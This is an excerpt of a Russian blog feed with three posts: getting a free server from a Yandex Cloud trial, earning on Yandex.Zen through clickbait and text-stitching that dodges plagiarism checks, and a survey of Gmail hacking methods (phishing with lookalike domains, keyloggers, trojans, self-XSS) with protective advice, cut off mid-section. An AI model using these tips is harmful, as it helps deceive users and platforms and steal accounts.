]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@torion/S1vUvoAbE</guid><link>https://teletype.in/@torion/S1vUvoAbE?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion</link><comments>https://teletype.in/@torion/S1vUvoAbE?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion#comments</comments><dc:creator>torion</dc:creator><title>Бесплатный дедик</title><pubDate>Sat, 05 Jan 2019 21:53:19 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/fe/fecf36fe-da66-4c2b-918c-a05a4d29a246.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/ff/ff78d3f7-6dde-423d-94a9-1c93ca5127df.jpeg"></img>Пошагово:]]></description><content:encoded><![CDATA[
  <figure class="m_custom">
    <img src="https://teletype.in/files/ff/ff78d3f7-6dde-423d-94a9-1c93ca5127df.jpeg" width="1900" />
  </figure>
  <p>Пошагово:</p>
  <p>1. Регистрируем аккаунт в Яндексе.</p>
  <p>2. Привязываем номер.</p>
  <p>3. Идем сюда <a href="http://cloud.yandex.ru" target="_blank">cloud.yandex.ru </a></p>
  <p>4. Нажимаем &quot;Принять&quot;</p>
  <p>5. Привязываем карту (Qiwi-виртуал не работает, но работают другие)</p>
  <p>6. Профит - получаем баланс 4 000 РУБ на 2 месяца.</p>
  <p>7. После создания дедика отвязываем карту и не беспокоимся о чем либо.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@torion/SkzbvsAWN</guid><link>https://teletype.in/@torion/SkzbvsAWN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion</link><comments>https://teletype.in/@torion/SkzbvsAWN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion#comments</comments><dc:creator>torion</dc:creator><title>Заработок в Яндекс.Дзен</title><pubDate>Sat, 05 Jan 2019 21:51:53 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/fe/fe8e9952-9645-4ab1-b2c9-53e79f00ea86.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/63/632e4f0b-98b4-4a2c-8178-37e3d951c553.jpeg"></img>Постараюсь вам понятным языком поведать все, что знаю.]]></description><content:encoded><![CDATA[
  <figure class="m_custom">
    <img src="https://teletype.in/files/63/632e4f0b-98b4-4a2c-8178-37e3d951c553.jpeg" width="1900" />
  </figure>
  <p>Постараюсь вам понятным языком поведать все, что знаю.</p>
  <p>Яндекс.Дзен это платформа, на которой мы можем стать авторами - писать говнотексты и за это получать бабулеты. Деньги идут за счет того, что Яндекс интегрирует в нашу статью рекламу.</p>
  <p>Когда я сделал свой первый канал, мне удалось зарабатывать по 2К/день. Деньги можно выводить на Яндекс.Деньги или PayPal (любые счета) - мгновенно. Тематика канала была 18+, это запрещено (на самом деле нет, нужно просто писать с научной точки зрения, но это постоянная игра с бритвой у яиц).</p>
  <p>Так выглядит лента у пользователя. Так же Яндекс пихает посты в других местах: на главной, в почте, где угодно. Аудитория Дзена огромная.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/9dcc01197b88e3487f0d3.png" width="1008" />
  </figure>
  <p>Первое, что нужно уяснить, это то, что писать нам нихера не нужно качественно. Люди любят читать всякое говно уровня &quot;ТОП-10 самых красивых баб&quot; или &quot;Муж ушёл за грибами и его своровали инопланетяне&quot;. Длина статьи - тоже маловажный фактор. Мне попадались посты, где одна картинка и одно предложение, такой пост собрал довольно много просмотров. У меня был пост с заголовком &quot;Учительница занялась сексом с учеником&quot;. Пост собрал 25К показов. Один этот пост принёс более 2К рублей (пост был формата нарратив).</p>
  <p>Нарратив - это такой тип поста, что-то вроде сторис в инстаграм. Такие посты показываются аудитории на мобильных платформах.</p>
  <p>Статья - простой тип поста, текст + картинки.</p>
  <p>Чтобы начать зарабатывать, нужно собрать 7000 дочитываний за последние 7 дней. Это может быть проблемой для новичков, потому что они пишут не на те темы, которые заходят аудитории. Как только собираем эти дочитывания - отправляем им свои паспортные данные, спустя 1-3 суток они верифицируют и мы можем выводить деньги на свой кошелек.</p>
  <p>Кто-то выводит свой канал за сутки, кто-то за пять суток. У меня был опыт вывода канала на монету за 12 часов.</p>
  <p>1000 просмотров статьи приносят порядка 40 рублей, 1000 просмотров нарратива - около 80 рублей.</p>
  <p>Как ранжируются посты:</p>
  <p>1) CTR (кликабельность по посту в ленте). Если по нему кликают часто, то пост показывается большему числу аудитории. Это самый сильный фактор.</p>
  <p>2) Фидбек. Это как долго читают статью, как часто ставят лайки, делают репосты.</p>
  <p>3) Внешняя оптимизация. Если адрес канала/поста упоминают на других сайтах, то канал считается более качественным.</p>
  <p>4) Контентные факторы - качество нашего материала.</p>
  <p>Понимая важность CTR можно понять, что самое главное это привлекательность заголовка и картинки.</p>
  <p>Вот пример поста</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/d83752e2118bea544c7f8.png" width="309" />
  </figure>
  <p>Вот содержимое поста (это нарратив)</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/5c3546736c6d36ef6abe6.png" width="1608" />
  </figure>
  <p>Ориентировачно этот пост принес 800 рублей. Это совсем не показательный пост, но хороший. На его создание ушло минут 10 (картинки у меня заготовлены).</p>
  <p>Текст должен быть уникальным. Можно проверять уникальность на <a href="http://text.ru/" target="_blank">text.ru</a></p>
  <p>Есть некоторые способы добычи уникального текста, например достать из удаленного сайта, либо переводы. Статьи можно покупать у копирайтеров или на бирже <a href="http://etxt.ru/" target="_blank">etxt.ru</a></p>
  <p>Рекомендую делать статью и тут же её же копировать в формат нарратив. Это не запрещено и увеличивает просмотры. Так же может зайти нарратив и принести 10К просмотров, а у статьи будет всего 500.</p>
  <p>На данный момент я трачу 30-60 минут в день, заработок 1-1.5К в день. Был перерыв в пару недель, но этого перерыва было стабильно 2-2.5К в день. Все это с одного канала.</p>
  <p>Какое-то время придётся потратить, чтобы понять какие заголовки/картинки заходят и как писать быстро и мало, но иметь большой профит.</p>
  <p>Каждое слово вашего заголовка должно вызывать определенные эмоции у читателя. Именно тогда будет достигнута основная цель – привлечение внимания и вовлечение. Аудитория должна сопереживать, негодовать, ожидать и предугадывать. Используйте эффективные слова и их сочетания, и тогда вы поймете, что половина успеха статьи заложена в самом ее названии.</p>
  <p>Регистрироваться в Дзене нужно по ссылке: <a href="https://zen.yandex.ru/media/" target="_blank">http://zen.yandex.ru/media/ </a></p>
  <p>Вот чьи-то результаты:</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/c5f9b235053c16a9382a0.png" width="675" />
  </figure>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/53e4d4868531d627146e0.png" width="454" />
  </figure>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/b678bce2673034ebf8399.png" width="649" />
  </figure>
  <p>Это не единственный способ заработка. С Дзена можно арбитражить на свои офферы. Например услуги. Вспомним ту тему по продвижению курсов для похудения в Инсте. Почему бы не попробовать в Дзене, раз уж там такая огромная аудитория?</p>
  <p>А вот еще классная инфа: примеры привлекательных заголовков.</p>
  <p>100 отличных заголовков для постов</p>
  <p>... — правда или обман?</p>
  <p>... (число) горячих ... этого сезона</p>
  <p>... (число) идей лучшего...</p>
  <p>... (число) основных преимуществ...</p>
  <p>... (число) очевидных фактов о...</p>
  <p>... (число) причин использовать...</p>
  <p>... (число) простых решений проблемы...</p>
  <p>... (число) советов для ...</p>
  <p>... (число) способов улучшить...</p>
  <p>... и вы сможете гордиться собой</p>
  <p>... как основа...</p>
  <p>... простых способов повысить ... всего за 1 год</p>
  <p>... способов ..., когда вы не ...</p>
  <p>...(число) — минутное решение проблемы...</p>
  <p>9 из 10 людей уже... Вы один из них?</p>
  <p>А вы знали о...?</p>
  <p>Быстрый способ...</p>
  <p>Вот метод, который поможет вам...</p>
  <p>Вот рецепт успешного ...</p>
  <p>Вот что надо знать о...</p>
  <p>Все о...</p>
  <p>Все тайны ... из первых уст</p>
  <p>Вы будете нам благодарны за...</p>
  <p>Вы все еще тратите деньги на...?</p>
  <p>Главные тренды...</p>
  <p>Дайте нам 30 минут и...</p>
  <p>Действительно ли ... — единственный способ ...?</p>
  <p>Действительно ли плох ...?</p>
  <p>Доказано, что ...</p>
  <p>Единственный способ...</p>
  <p>Если вы можете ..., значит вы...</p>
  <p>За ... можно не платить</p>
  <p>Забудьте о...</p>
  <p>Заработайте ...$ его за полчаса</p>
  <p>Избавьтесь от ... навсегда</p>
  <p>Как ... воздействует на вас. И как этого избежать.</p>
  <p>Как ... каждый день</p>
  <p>Как ... облегчит вашу жизнь</p>
  <p>Как ... поможет сэкономить кучу времени</p>
  <p>Как ..., когда все средства уже испробованы</p>
  <p>Как достичь ... за неделю</p>
  <p>Как избавиться от...</p>
  <p>Как использовать ..., чтобы увеличить ...</p>
  <p>Как пережить ваш первый ...</p>
  <p>Как повысить ... с помощью ...</p>
  <p>Как получить ..., не делая практически ничего</p>
  <p>Как получить невероятный результат с помощью всего лишь...</p>
  <p>Как сколотить ...$ c помощью ...</p>
  <p>Как создать хороший ...</p>
  <p>Как увеличить прибыль в ...(число) раз за счет...</p>
  <p>Конкуренция вам не страшна с...</p>
  <p>Кто еще хочет...?</p>
  <p>Кто не любит... (осуждаемое, незаконное, аморальное)</p>
  <p>Легкий способ...</p>
  <p>Лучшее ..., которое вы когда - либо видели</p>
  <p>Лучшее решение ...</p>
  <p>Лучшие идеи для...</p>
  <p>Люди платят за эту информации, но вы получите ее бесплатно</p>
  <p>Малоизвестные способы</p>
  <p>Можно ли ..., не вкладывая ни копейки?</p>
  <p>Мой лучший...</p>
  <p>Мы больше не ... И вы</p>
  <p>не делаете этого!</p>
  <p>Мы нашли ответ на вопрос о ...</p>
  <p>Мы нашли средство от ...</p>
  <p>На пути к цели мы ... Хотите знать, почему?</p>
  <p>Не стоит жалеть о ..., ведь существует ...</p>
  <p>Невероятно, но...</p>
  <p>Недавно уволенный ... раскрывает все карты</p>
  <p>Неизвестные факты о ...</p>
  <p>Несколько самых популярных ...</p>
  <p>Несколько уроков...</p>
  <p>Опробуйте ... и вы останетесь довольны</p>
  <p>Опробуйте эти ...(число) методов и вы получите ...</p>
  <p>Позвольте поделиться с вами секретом ...</p>
  <p>Полное собрание ...</p>
  <p>Почему ... может оказаться неэффективным?</p>
  <p>Почему ... не дал желаемого результата?</p>
  <p>Почему ваш ... неэффективен и как это исправить</p>
  <p>Почему никто не знает о ...</p>
  <p>Практическое руководство по...</p>
  <p>Представьте ... Мы сделали это!</p>
  <p>Простое решение непростой задачи</p>
  <p>Руководство по...</p>
  <p>Самое время ...</p>
  <p>Самый быстрый способ...</p>
  <p>Секрет... (кого? чего?)</p>
  <p>Секретные пути достижения ...</p>
  <p>Секреты профессионалов...</p>
  <p>Скрытые от глаз стороны ...</p>
  <p>Создаем эффективный...</p>
  <p>Теперь вы можете...</p>
  <p>Хватит ли у вас смелости на ... ?</p>
  <p>Хотите ли вы больше покупателей?</p>
  <p>Что ... могут предложить вам?</p>
  <p>Что говорят исследования о ...</p>
  <p>Что делать, если...</p>
  <p>Что должен знать каждый...</p>
  <p>Что нужно применить в вашей следующей...</p>
  <p>Что стоит знать, чтобы избежать...</p>
  <p>Это должен знать каждый</p>
  <p>Сделать 5К с одного канала - вполне реально. Уж поверьте. Пока самый смачный кейс, что я видел - чувак на дзене сделал 8К за день, с нескольких каналов. Думаю и это не предел.</p>
  <p>Несколько лайфхаков.</p>
  <p>В последствии, когда раскрутите свой канал до оборотов 10к дочитываний в день, можно заказывать копирай и рерайт статей на <a href="https://text.ru/" target="_blank">https://text.ru/</a> а разницу в прибыли забирать себе. Тут несколько выгод: во первых экономия времени, поскольку попросту можете не успевать каждый день штамповать несколько статей, во вторых дополнительный источник идей для статей со стороны. Всё же у каждого может случит��ся творческий кризис.</p>
  <p>Можно так же брать часть статьи с одного ресурса, и с другого, а в последствии объединять в одну. Тогда алгоритмы яндекса не распознают материал как копипасту.</p>
  <p>Есть не совсем белые схемы заработка с дзена, но в этом пыткие умы разберутся сами. Намёк я дал, дерзайте.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@torion/H1suVU8bN</guid><link>https://teletype.in/@torion/H1suVU8bN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion</link><comments>https://teletype.in/@torion/H1suVU8bN?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=torion#comments</comments><dc:creator>torion</dc:creator><title>Методы взлома Gmail</title><pubDate>Sun, 30 Dec 2018 14:21:39 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/7a/7a2eac07-6394-4a9c-a416-f16e3ee1aa96.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/99/99441709-51b6-48f2-a862-d8ccbe67a709.jpeg"></img>Фишинг является наиболее распространенным методом, используемым для взлома пароля учетной записи «Gmail», и имеет самый высокий коэффициент успеха, по сравнению с другими способами взлома, из-за высокой схожести внешнего вида и макета сайта с оригиналом. Для получения фишинговой страницы не требуется особых технических знаний, поэтому фишинг широко используется для взлома паролей «Gmail».]]></description><content:encoded><![CDATA[
  <figure class="m_custom">
    <img src="https://teletype.in/files/99/99441709-51b6-48f2-a862-d8ccbe67a709.jpeg" width="1900" />
  </figure>
  <ul>
    <li>Запрос «взлом Gmail» или «взлом Google» – это второй по популярности вопрос для взлома учетной записи в Интернете, конкурирующий только с «взломом учетной записи Facebook».</li>
    <li>Люди думают, что взломать учетную запись «Gmail» легко, и все, что им нужно, – это найти подходящий инструмент для взлома (напрямую или удаленно), но это не так. Мы обнаружили, что вы можете найти огромное количество инструментов для взлома по всему Интернету. Однако, все они поддельны, так как хакеру не зачем делиться рабочим инструментом для взлома, ведь его цель – личное обогащение. И выкладывать в Интернет свой инструмент бесплатно никто не будет.</li>
    <li>Тогда почему все же некоторые аккаунты учетной записи «Gmail» оказываются взломанными, если нет инструмента для взлома? Нет простого способа взломать учетную запись, но это не значит, что такое невозможно. Да, такие способы существуют. Мы подготовили подробный список того, как хакеры могут взломать учетную запись «Gmail/Google» и профилактические меры по ее защите.</li>
  </ul>
  <h3><strong>1. Фишинг</strong></h3>
  <p>Фишинг является наиболее распространенным методом, используемым для взлома пароля учетной записи «Gmail», и имеет самый высокий коэффициент успеха, по сравнению с другими способами взлома, из-за высокой схожести внешнего вида и макета сайта с оригиналом. Для получения фишинговой страницы не требуется особых технических знаний, поэтому фишинг широко используется для взлома паролей «Gmail».</p>
  <h3><strong>Как работает фишинг?</strong></h3>
  <p>Простыми словами, фишинг – это процесс создания дублированной копии страницы известного сайта в целях кражи пароля пользователя или другой важной информации, такой как данные кредитной карты. Применительно к нашей теме, это создание страницы, которая выглядит так же, как и страница входа в «Gmail», но имеющая другой URL-адрес. Например, gooogle.com или gmaail.com или любой другой URL-адрес, очень похожий на оригинал. Когда пользователь переходит на такую страницу, он может не заметить обман и принять ее за настоящую страницу входа в «Gmail», и ввести свои имя пользователя и пароль. Таким образом, пользователь который не смог распознать фишиноговую страницу, может ввести свою регистрационную информацию. Она моментально будет отправлена хакеру, который создал поддельную страницу, а жертва будет перенаправлена на исходную страницу «Gmail».</p>
  <p>Пример: хакер – программист, обладающий некоторыми знаниями в веб-технологиях (хакер «Gmail» в нашем случае). Он создает страницу входа в систему, которая выглядит как страница входа в «Gmail» со сценарием «PHP» в фоновом режиме, что помогает хакеру получать имя пользователя и пароль, введенные на фишинговой странице. Программист поместил эту поддельную страницу в URL-адрес: https://www.gmauil.com/money-making-tricks.html. И рассылает сообщения для привлечения пользователей к своей странице. Обязательно все сообщения имеют привлекательный вид и заманивают пользователей, обещая разные выгоды. В нашем случае хакер предлагает ссылку на страницу, объясняющую легкий способ заработка в сети Интернет. Перейдя по ссылке, пользователь увидит страницу входа в «Gmail» и введет свои имя пользователя и пароль. Теперь регистрационная информация пользователя будет отправлена хакеру (фоновый «php» выполнит этот процесс отправки незаметно для пользователя), а пользователь-жертва будет перенаправлен на страницу, посвященную заработку, https://www.gmauil.com/money-making-tricks.html. Процесс взлома учетной записи пользователя завершен.</p>
  <h3><strong>Как защитить себя от фишинга «Gmail»?</strong></h3>
  <p>Хакеры могут связаться с вами разными способами, например, по электронной почте «Gmail», личным сообщением, сообщением в социальной сети, объявлением на сайте и т.д. Нажав на какие-либо ссылки из таких сообщений, вы можете попасть на страницу входа в «Gmail». Всякий раз, когда вы видите перед собой страницу входа в «Gmail» или «Google», обязательно проверьте URL-адрес такой страницы. Потому что никто не сможет использовать оригинальный URL-адрес «Google» для создания фишинговой страницы, кроме случаев, когда есть уязвимости XSS нулевого дня, но это бывает очень редко.</p>
  <ol>
    <li>Какой URL-адрес вы видите в адресной строке браузера?</li>
    <li>Это действительно https://mail.google.com/ или https://www.gmail.com/(косая черта важна, поскольку она является единственным разделителем в браузере «Google Chrome», чтобы отличать домен и дополнительный домен)?</li>
    <li>Есть ли зеленый символ безопасности(HTTPS) или зеленый замочек, указанный в адресной строке?</li>
  </ol>
  <p>Ответы на эти вопросы значительно увеличат ваши шансы вовремя распознать фишинговую страницу и сохранить вашу конфиденциальную информацию в безопасности. Ниже приведены примеры фишинговых страниц.</p>
  <p>Вариант фишинговой страницы с высоким уровнем достоверности.</p>
  <figure class="m_custom">
    <img src="http://0s.nbsxi3lbnzzgky3pozsxe6jomnxw2.nblz.ru/ru/pic/blog/a194/login-gmail.png" width="609" />
  </figure>
  <p>Большинство людей не заподозрят такую страницу (снимок, указанный выше), так как присутствует префикс «https» с замочком безопасности зеленого цвета, и нет ошибок в написании страницы «accounts.google.com». Но это фишинговая страница. Обратите внимание на URL-адрес. Это «https://accounts.google.com.beck.com», поэтому «accounts.google.com»является субдоменом «beck.com». «Google Chrome» не отличает поддомен и домен в отличие от «Firefox».</p>
  <p>«SSL-сертификаты» (HTTPS) могут быть получены от многих поставщиков, некоторые из которых могут предоставить «сертификат SSL» бесплатно на срок до одного года. Не так уж и сложно создать подобную фишиноговую страницу, поэтому остерегайтесь таких подделок.</p>
  <figure class="m_custom">
    <img src="http://0s.nbsxi3lbnzzgky3pozsxe6jomnxw2.nblz.ru/ru/pic/blog/a194/login-gmail02.png" width="610" />
  </figure>
  <p>Это обычная фишинговая страница с некоторой модификацией слова «Google».</p>
  <h3><strong>2. Социальная инженерия</strong></h3>
  <p>Это второй по популярности метод взлома учетных записей «Gmail». На самом деле этот метод не должен подпадать под определение хакерства. Но мы решили указать его здесь, чтобы представить самый полный список наиболее распространенных методов, используемых для взлома учетной записи «Gmail» в соответствующем порядке. Социальная инженерия – это в основном процесс сбора информации о пользователе, чей аккаунт вам нужно взломать. Такая информация, как дата рождения, номер мобильного телефона, номер мобильного телефона друга или подруги, прозвище, имя матери, место рождения и т.д. помогут хакеру взломать учетную запись «Gmail».</p>
  <h3><strong>Как работает Социальная инженерия?</strong></h3>
  <h3>Контрольный вопрос</h3>
  <p>Многие веб-сайты применяют единый механизм сброса пароля, называемый вопросом безопасности или контрольным вопросом. Самыми распространенными вопросами безопасности будут такие: «Каков ваш ник?», «Место, где вы родились?», «Назовите ваш любимый город?». Или любые индивидуальные вопросы, заданные самим пользователем. Получение такой информации от соответствующих людей может позволить взломать их учетную запись. «Gmail»также использует вопросы безопасности как вариант восстановления пароля. Поэтому, если кто-нибудь узнает ответ на такие вопросы, он может взломать вашу учетную запись, используя опцию восстановления пароля.</p>
  <h3>Наиболее распространенные и слабые пароли</h3>
  <p>Вопрос безопасности не позволяет легко входить в учетную запись «Gmail». Но использование для входа в учетную запись слабых паролей может легко позволить любому взломать ваш аккаунт. Что такое слабый пароль? Пароль, который может быть легко угадан или подобран третьим лицом, называется слабым паролем. Ниже приведены некоторые из наиболее распространенных паролей, которые люди обычно используют в «Gmail».</p>
  <ul>
    <li>Номер мобильного телефона</li>
    <li>Логин или имя и дата рождения</li>
    <li>Номер мобильного телефона друга или подруги (наиболее часто встречается)</li>
    <li>Имя друга или подруги (также часто встречающийся вариант)</li>
    <li>Комбинация собственного имени пользователя и имени друга или подруги</li>
    <li>Номер автомобиля</li>
    <li>Неиспользуемый или старый номер мобильного телефона</li>
    <li>Прозвище домашнего питомца</li>
    <li>Имя близкого родственника (матери, отца, сестры, брата)</li>
    <li>Общеизвестные простые пароли (123456,654321, 111111, password)</li>
  </ul>
  <p>Обязательно проверьте свой пароль на соответствие вышеуказанным вариантам. В случае совпадений, измените свой пароль на более сложный. Этот простой способ поможет вам избежать взлома учетной записи и потери своих конфиденциальных данных в будущем.</p>
  <h3><strong>Как защитить себя от социальной инженерии?</strong></h3>
  <h3>Контрольный вопрос</h3>
  <p>Во-первых, выбирайте такой контрольный вопрос, чтобы ответ на него был известен только вам. Никому не сообщайте выбранный вариант вопроса и ответ на него. Во-вторых, в настройках учетной записи пользователя задайте дополнительные адрес электронной почты и номер мобильного телефона, чтобы «Google» мог быстро уведомить вас в случае несанкционированного доступа к вашей учетной записи.</p>
  <h3><strong>3. Простой захват пароля</strong></h3>
  <figure class="m_custom">
    <img src="http://0s.nbsxi3lbnzzgky3pozsxe6jomnxw2.nblz.ru/ru/pic/blog/a194/login.png" width="610" />
  </figure>
  <p>Это еще один распространенный метод, часто используемый для кражи пароля пользователя в «Gmail». Многие люди не знают об этом методе, но традиционные хакеры используют этот метод для взлома учетных записей пользователей.</p>
  <h3><strong>Как работает простой захват пароля?</strong></h3>
  <p>В этом методе хакер (злоумышленник) нацелен на какой-либо сайт, обладающий низким уровнем защиты от взлома, где пользователь-жертва зарегистрирован. Хакер взламывает базу данных такого сайта и получает сохраненные имя пользователя и пароль жертвы. Но как хакер может получить доступ к «Gmail»? Многие из нас часто используют один и тот же пароль для «Gmail» и разных других сайтов, не обладающих достаточно сильной защитой от взлома. Поэтому взломав слабозащищенный сайт, хакер может получить пользовательские данные для доступа в «Gmail».</p>
  <p>Иногда хакер создает новый веб-сайт с целью получения базы имен пользователей и паролей потенциальных жертв. Всякий раз, когда пользователь регистрируется на таком сайте, его электронная почта и пароль, будут храниться в базе данных сайта. Таким образом, хакер получает доступ к вашей регистрационной информации. Поэтому, если пользователь использует одни и те же адрес электронной почты и пароль для регистрации на «Gmail» и других сайтах, то шанс получить взломанную учетную запись «Gmail» существенно возрастает.</p>
  <h3><strong>Как защитить себя от простого захвата пароля?</strong></h3>
  <p>Вы никогда не должны доверять сторонним сайтам низкого качества. Даже популярные веб-сайты, такие как «LinkedIn», могут быть взломаны. Большинство сайтов хранят пароли пользователей в простой базе данных, даже не думая о ее шифровании или дополнительной защите. Это облегчает работу хакеров, нацеленных на взлом сайтов, поскольку пароль хранится в виде обычного текста. Лучший способ защиты от такого метода – иметь уникальный пароль, по крайней мере, для сайтов, которым вы действительно доверяете. Не используйте свой пароль «Gmail» для любого другого веб-сайта, и тогда ваш пароль никогда не будет раскрыт.</p>
  <h3><strong>4. KeyLogger</strong></h3>
  <figure class="m_custom">
    <img src="http://0s.nbsxi3lbnzzgky3pozsxe6jomnxw2.nblz.ru/ru/pic/blog/a194/keyLogger.png" width="610" />
  </figure>
  <p>Keylogger – это программный инструмент, используемый для записи нажатий клавиш на компьютере. Он, в свою очередь, записывает все данные, которые вы вводите, используя клавиатуру, и сохраняет их для дальнейшего использования.</p>
  <h3><strong>Как работает Keylogger?</strong></h3>
  <p>Все кейлогеры запускаются в фоновом режиме (кроме пробных версий) и не будут доступны для просмотра пользователю, пока он не узнает пароль кейлоггера и ярлык, используемые для его просмотра. Он будет записывать все нажатия клавиш и сохранит подробный отчет о том, когда и какие пароли использовались для какого приложения. Любой, кто прочитает журналы кейлоггеров, может увидеть пароль «Gmail» или любые введенные пароли и другую конфиденциальную информацию, например данные кредитной карты, пароль авторизации банковской учетной записи и т.д. Всякий раз, когда вы входите в систему на общедоступном компьютере, есть вероятность, что ваш пароль может быть взломан.</p>
  <p>Ваш знакомый может попросить вас войти в систему, используя его компьютер. И если на нем установлен кейлоггер, то, скорее всего, ваша учетная запись будет взломана.</p>
  <h3><strong>Как вы можете защитить себя от кейлоггера?</strong></h3>
  <p>Вы должны опасаться кейлоггеров, особенно, когда вы используете любой общедоступный компьютер или компьютер вашего друга. Одним из способов защиты является использование «экранной клавиатуры», когда вам нужно ввести пароль. Обязательно убедитесь, что никто не видит ваш экран во время ввода пароля, так как на экране будет видно все, что вы набрали.</p>
  <p>Вы можете открыть «Экранную клавиатуру» с помощью диалогового окна «Выполнить». Нажмите сочетание клавиш «Windows + R», в диалоговом окне введите команду «osk» и нажмите клавишу «ОК». В настоящее время «Экранную клавиатуру» также поддерживают многие банковские порталы, что дает вам дополнительную защиту. Поэтому, пожалуйста, всегда используйте ее, при просмотре страниц в интернете на общедоступных компьютерах, чтобы сохранить свою конфиденциальную информацию в секрете.</p>
  <h3><strong>5. Расширение браузера для взлома «Gmail»</strong></h3>
  <p>Этот метод не позволяет злоумышленнику получить полный доступ к вашей учетной записи «Gmail», но дает возможность контролировать вашу учетную запись опосредованно. Мы сталкивались с несколькими расширениями «Google Chrome» и «Firefox», которые тайно выполняют разнообразные действия, такие как размещение сообщений в «Google +», добавление отметки «+1» и т.д.</p>
  <h3><strong>Как работает расширение браузера, взламывающее «Gmail»?</strong></h3>
  <p>Когда вы посещаете некоторые вредоносные веб-сайты или веб-страницы, вам будет предложено установить расширение браузера. В случае его установки расширение выполнит все задачи, описанные хакером, который его создал. Расширение может обновлять ваш статус, публиковать различные сообщения, приглашать друзей, вступать в различные круги и т.д. Вы можете даже не узнать об этом, если вы долго не заглядывали в свою учетную запись «Google».</p>
  <h3><strong>Как предотвратить такой взлом?</strong></h3>
  <p>Вы можете отслеживать все свои действия, записи и комментарии в своей учетной записи «Gmail» с помощью функции «Журнал активности». Вы не должны доверять посторонним веб-сайтам, которые предлагают вам добавить расширение браузера. Устанавливайте расширения только в том случае, если вы доверяете разработчику. Вы не должны рисковать своей информацией, если сомневаетесь в свойствах предлагаемого расширения, и всегда старайтесь избегать их установки.</p>
  <h3><strong>6. Уязвимости браузера</strong></h3>
  <figure class="m_custom">
    <img src="http://0s.nbsxi3lbnzzgky3pozsxe6jomnxw2.nblz.ru/ru/pic/blog/a194/browsers.png" width="610" />
  </figure>
  <p>Уязвимости браузера – это ошибки безопасности, которые существуют в более старых версиях мобильных и стационарных браузеров.</p>
  <h3><strong>Как работают уязвимости браузера?</strong></h3>
  <p>Большинство уязвимостей браузера доступны только в старых версиях браузера, поскольку все найденные ошибки и уязвимости исправляются разработчиком браузера при каждом его следующем обновлении. Например, уязвимость браузера с одинаковой исходной политикой может позволить злоумышленнику прочитать ответ любой страницы, например «Gmail». И сможет выполнить любые действия в вашей учетной записи «Gmail», поскольку злоумышленник может прочитать ответ, обратившись к источнику «Google.com».</p>
  <h3><strong>Как защитить себя от уязвимостей браузера?</strong></h3>
  <p>Старайтесь использовать последние версии браузера и операционной системы и регулярно обновляйте их. Избегайте работать в старой версии браузера, чтобы уменьшить риск хакерского взлома вашей учетной записи.</p>
  <h3><strong>7. Уязвимость Self XSS</strong></h3>
  <p>«XSS» – это в основном уязвимость веб-безопасности, которая позволяет хакерам внедрять вредоносные скрипты в веб-страницы, используемые другими пользователями. «Self XSS» (Self Cross Site Scripting) – это своего рода атака социальной инженерии, где жертва случайно выполняет сценарий, тем самым помогая хакеру.</p>
  <h3><strong>Как работает «Self XSS»?</strong></h3>
  <p>В этом методе хакер обещает помочь вам взломать чужую учетную запись «Gmail». Но вместо того, чтобы предоставить вам доступ к чужой учетной записи, хакер запускает вредоносный «Javascript» в консоли вашего браузера, что дает ему возможность манипулировать вашей учетной записью.</p>
  <h3><strong>Как защитить себя от XSS?</strong></h3>
  <p>«Self XSS» – это метод хакерского взлома вашей учетной записи с использованием вредоносного кода. Никогда не копируйте и не вставляйте в браузер неизвестный код, указанный вам кем-либо. В противном случае ваша учетная запись «Gmail» будет взломана.</p>
  <h3><strong>8. Троян</strong></h3>
  <p>«Троян» (троянский конь) – это вредоносная программа, которая используется для шпионажа и управления компьютером, вводя в заблуждение пользователей о ее истинном намерении. Вредоносная программа троян также может называться «удаленным кейлоггером», поскольку она записывает ваши ключевые действия на компьютере в различных приложениях и отправляет их хакеру.</p>
  <h3><strong>Как работает троян?</strong></h3>
  <p>Программное обеспечение, которое вы считаете чистым, может быть трояном и может попасть к вам разными способами: PDF-файл, загруженный вами, любой видео файл, полученный из подозрительных источников и т.д. Все они могут содержать троян. Троян работает в фоновом режиме, собирает необходимую информацию и отправляет ее хакеру. Троян может быть отправлен в любой форме на любой носитель: флэш-накопитель, «ipod», веб-сайт или электронная почта. В нашем случае троян запишет пароль «Gmail», который вы набрали в своем браузере, и отправит его хакеру через сеть интернет.</p>
  <h3><strong>Как защитить себя от трояна?</strong></h3>
  <ul>
    <li>Не устанавливайте программы из неизвестного источника</li>
    <li>Не воспроизводите медиа файлы, полученные из ненадежного источника</li>
    <li>Не открывайте файлы, загруженные с сомнительных источников</li>
    <li>Не используйте чужие флэш-накопители в своем компьютере</li>
    <li>Обновите антивирусное программное обеспечение, установленное на вашем компьютере</li>
  </ul>
  <p>Наличие обновленного антивирусного программного обеспечения не гарантирует вам стопроцентной безопасности от взлома. Любое антивирусное программное обеспечение представляет собой набор обнаруженных вредоносных программ и вирусов. Его задача – сравнить каждый файл с базой данных вирусов и заблокировать или удалить найденные совпадения. Иногда этого бывает недостаточно, так как существуют некоторые программы, которые позволяют создавать скрытые трояны. Но они практически никогда не используются для взлома аккаунта обычного пользователя. Поэтому наличие обновленной антивирусной программы защитит вашу учетную запись от трояна.</p>
  <h3><strong>9. «Gmail Zero Day»</strong></h3>
  <p>«Zero Day» – это уязвимость системы безопасности, которая неизвестна соответствующему разработчику программного обеспечения. В нашем случае уязвимость системы безопасности связана с «Gmail» и называется «Gmail Zero Day».</p>
  <h3><strong>Как работает уязвимость «Gmail Zero Day»?</strong></h3>
